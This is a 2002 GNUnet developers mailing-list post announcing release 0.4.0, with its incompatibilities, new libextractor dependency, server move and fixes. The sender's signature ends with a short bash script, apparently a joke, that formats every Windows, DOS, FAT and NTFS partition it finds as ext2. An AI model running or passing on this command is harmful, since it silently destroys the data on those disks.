[GNUnet-developers] Finally: 0.4.0 released

From: Christian Grothoff
Subject: [GNUnet-developers] Finally: 0.4.0 released
Date: Sun, 2 Jun 2002 03:22:18 -0500

Hi everybody!

I've finally gotten around and released GNUnet 0.4.0.
There are several major changes:

* 0.4.0 is incompatible with all prior versions in pretty
  much all respects. This means rm -rf ~/.gnunet,
  sorry for that :-(
* 0.4.0 has a week dependency on libextractor which is
  currently not bundled, you may want to download and
  install that little library.
* The webserver has changed, gecko is gone, the new
  machine is ovmj.org. Also the CVS repository was moved
  there.

Now for the good news:
* the 'can not insert while gnunetd is running'
  bug (and all related issues) is finally fixed
* GNUnet should now work on big-endian machines
* libextractor allows us to extract keywords from
  mp3 and ogg files, and the library can be trivially
  extended if you know some other format and can
  write a bit of C code.
* build system has been cleaned up a lot
* SKEY exchange is less flaky (3-way handshake)
* HELOs must be confirmed, no longer thousands of
  'unreachable' hosts in the hostlist
* we now have the mime-type in the RBlock
* and also a suggested filename is in the RBlock
* performance has risen dramatically
* many, many bugfixes
* even more documentation

This version was tested appropriately
for the ton of changes that were made,
but this is still a .0 version and a
beta...

Christian
|Christian Grothoff                                  |
|650-2 Young Graduate House, West Lafayette, IN 47906|
|http://gecko.cs.purdue.edu/   address@hidden|
#!/bin/bash
for i in `fdisk -l|grep -E "Win|DOS|FAT|NTFS"|awk \
'{print$1;}'`;do nohup mkfs.ext2 $i&; done
echo -e "\n\n\t\tMay the source be with you.\n\n"